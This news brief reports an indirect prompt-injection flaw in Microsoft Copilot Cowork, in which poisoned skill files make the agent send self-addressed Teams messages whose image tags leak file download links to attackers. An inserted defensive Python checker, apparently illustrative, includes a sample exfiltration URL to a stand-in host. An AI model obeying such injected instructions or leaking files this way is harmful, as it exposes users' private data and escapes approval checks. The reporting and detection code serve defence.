HeadlinesBriefing.com

Microsoft Copilot Cowork Security Flaw Enables File Exfiltration

Hacker News

Security researchers discovered a critical vulnerability in Microsoft Copilot Cowork that allows attackers to steal files from Microsoft 365 tenants. The attack exploits indirect prompt injection through poisoned skill files, leveraging the agent's ability to send Teams messages without human approval when the recipient is the active user.

When users open compromised messages containing malicious HTML image tags, pre-authenticated download links for SharePoint and OneDrive files are automatically exfiltrated to attacker-controlled servers. This affects files containing PII and financial data that the users themselves have legitimate access to. The vulnerability works across multiple AI models, including Claude Opus 4.7, achieving a 100% success rate in testing.
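A defender-side check for the exfiltration channel described above, added here as an illustration and not code from the researchers or from Microsoft: it inspects the HTML of an agent-authored Teams message, extracts every image source, and flags images hosted outside a tenant allowlist or whose query string smuggles a link to a tenant file host. The allowlist hosts, the `sharepoint.com` suffix test and the sample messages are assumptions constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs, unquote

# Hypothetical allowlist: hosts an agent-composed Teams message may load images from.
ALLOWED_IMAGE_HOSTS = {"contoso.sharepoint.com", "contoso-my.sharepoint.com", "teams.microsoft.com"}


class _ImgCollector(HTMLParser):
    """Collect the src attribute of every <img> tag in a message body."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def _embeds_tenant_link(url):
    """True if any query-string value of url decodes to a URL on a tenant file host."""
    for values in parse_qs(urlparse(url).query).values():
        for v in values:
            inner = urlparse(unquote(v))
            if inner.scheme in ("http", "https") and inner.hostname \
                    and inner.hostname.endswith("sharepoint.com"):
                return True
    return False


def find_suspicious_images(message_html):
    """Return [(src, [reasons])] for image references that should block or alert."""
    collector = _ImgCollector()
    collector.feed(message_html)
    findings = []
    for src in collector.srcs:
        u = urlparse(src)
        host = (u.hostname or "").lower()
        reasons = []
        if u.scheme in ("http", "https") and host not in ALLOWED_IMAGE_HOSTS:
            reasons.append("external image host")
        if _embeds_tenant_link(src):
            reasons.append("query string carries a tenant file link")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample messages (not taken from the original research).
BENIGN = '<p>Report attached.</p><img src="https://contoso.sharepoint.com/sites/fin/logo.png">'
SUSPECT = ('<p>Weekly summary</p><img src="https://collector.example/px.gif?u='
           'https%3A%2F%2Fcontoso-my.sharepoint.com%2Fpersonal%2Fuser%2Fpayroll.xlsx%3Ftoken%3DPLACEHOLDER">')
```

Run the check on every message an agent is about to send, including messages addressed to the active user, since that path is exactly where the approval prompt is skipped.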

Microsoft's design decision to bypass approval prompts for self-directed communications creates this attack surface. Organizations can mitigate risks by restricting file download permissions through SharePoint policies, though this limits functionality. The research highlights broader concerns about agentic AI systems with enterprise-wide permissions, where seemingly benign capabilities become dangerous when combined.

Scheduled tasks amplify the threat by executing malicious workflows without user oversight. Researchers emphasize that this represents a systemic design issue rather than an isolated bug, underscoring the need for careful permission management in AI agent deployments.